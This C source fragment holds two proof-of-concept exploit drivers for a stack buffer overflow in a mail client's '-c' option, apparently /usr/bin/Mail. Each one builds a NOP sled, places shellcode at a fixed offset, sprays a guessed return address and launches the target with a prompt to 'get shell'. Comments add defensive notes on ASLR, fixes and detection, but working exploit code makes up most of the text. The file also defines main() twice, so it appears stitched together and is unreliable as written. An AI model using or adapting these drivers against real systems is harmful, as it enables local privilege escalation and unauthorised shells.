/*
 * Proof-of-concept driver for a stack buffer overflow: it builds an oversized
 * string in the file-level `buf` and passes it to the program at PATH as the
 * value of its "-c" option.
 *
 * What the code writes into buf (buf, NOP, BUFFER, code, PATH and getesp()
 * are defined elsewhere in the file):
 *   - every one of the BUFFER bytes is first set to NOP;
 *   - the bytes of `code` are copied in at offset 800;
 *   - from offset 876 up to (but not including) BUFFER - 2, in steps of 4,
 *     an int-sized copy of one fixed value is stored.
 * That value is getesp() - 11000, plus argv[1] parsed with atoi() when an
 * argument is supplied.
 *
 * Defender's reading: the technique depends on a predictable, executable
 * stack in the target, so ASLR and a non-executable stack undermine it; the
 * real fix is a length check where the target copies the "-c" value.
 * NOTE(review): the vulnerable copy itself is not shown here; presumably it
 * is in the target's handling of "-c". Confirm against the advisory.
 * For detection, an exec record for a mail client carrying an argv element
 * thousands of bytes long is anomalous and worth alerting on.
 */
int main(int argc, char * argv[])
{
    int pos;
    int delta = 0;
    long fill_value;

    /* Optional adjustment supplied on the command line. */
    if (argc > 1) {
        delta = atoi(argv[1]);
    }

    fill_value = getesp() - 11000 + delta;

    /* Padding first, then the payload bytes at a fixed offset. */
    memset(buf, NOP, BUFFER);
    memcpy(buf + 800, code, strlen(code));

    /* Repeat the same int-sized value over the rest of the buffer. */
    pos = 876;
    while (pos < BUFFER - 2) {
        *(int *)&buf[pos] = fill_value;
        pos += 4;
    }

    fprintf (stderr, "Hit '.' to get shell..\n");

    /* On success execl() replaces this process and never returns. */
    execl(PATH, PATH, "x", "-s", "x", "-c", buf, 0);
}
/*
 * Proof-of-concept driver for a stack buffer overflow: it builds an oversized
 * string in the file-level `buffer` and passes it to /usr/bin/Mail as the
 * value of the "-c" option.
 *
 * What the code writes into buffer (buffer, shellcode and getesp() are
 * defined elsewhere in the file):
 *   - the first 10000 bytes are set to 0x90;
 *   - the bytes of `shellcode` are copied in at offset 800;
 *   - from offset 876 up to (but not including) 9998, in steps of 4, an
 *     int-sized copy of the fixed value getesp() - 18000 is stored.
 * argc and argv are not used.
 *
 * Defender's reading: the technique depends on a predictable, executable
 * stack in the target, so ASLR and a non-executable stack undermine it; the
 * real fix is a length check where the mail client copies the "-c" value.
 * NOTE(review): the vulnerable copy itself is not shown here; presumably it
 * is in the target's handling of "-c". Confirm against the advisory.
 * For detection, an exec record for /usr/bin/Mail carrying an argv element
 * thousands of bytes long is anomalous and worth alerting on.
 */
int main(int argc, char **argv)
{
    int pos;
    long fill_value;

    fill_value = getesp() - 18000;

    /* Padding first, then the payload bytes at a fixed offset. */
    memset(buffer, 0x90, 10000);
    memcpy(buffer + 800, shellcode, strlen(shellcode));

    /* Repeat the same int-sized value over the rest of the buffer. */
    pos = 876;
    while (pos < 9998) {
        *(int *)&buffer[pos] = fill_value;
        pos += 4;
    }

    fprintf(stderr, "type '.' and enter: ");

    /* On success execl() replaces this process and never returns. */
    execl("/usr/bin/Mail", "/usr/bin/Mail", "nobody", "-s", "blah", "-c",
          buffer, 0);
}